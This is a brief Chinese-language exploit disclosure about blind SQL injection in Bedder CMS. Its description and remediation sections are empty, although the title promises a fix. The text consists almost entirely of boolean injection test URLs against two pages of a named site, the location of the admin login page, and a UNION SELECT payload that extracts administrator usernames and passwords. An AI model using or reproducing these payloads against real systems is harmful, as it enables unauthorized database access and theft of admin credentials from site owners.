Bedder CMS盲注缺陷及修复
时间:2011-04-19 来源:Xecuti0n3r
发布日期:2011-04.18
发布作者:Xecuti0n3r
漏洞类型:SQL注入
漏洞描述:
漏洞测试:
注入一:
[+]True : http://www.hackline.net/teams.php?id=1 and 1=1--
[+]False: http://www.hackline.net/teams.php?id=1 and 1=2--
[+]eViL : http://www.hackline.net/teams.php?id=[SQLi]
注入二、
[+]True : http://www.hackline.net/activiteiten.php?id=91 and 1=1--
[+]False: http://www.hackline.net/activiteiten.php?id=91 and 1=2--
[+]eViL : http://www.hackline.net/activiteiten.php?id=[SQLi]
后台登录页:
[+]Cms Login Page is at : http://www.hackline.net/cms/index.php
注入获取管理员密码语句:
[+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie
标签分类: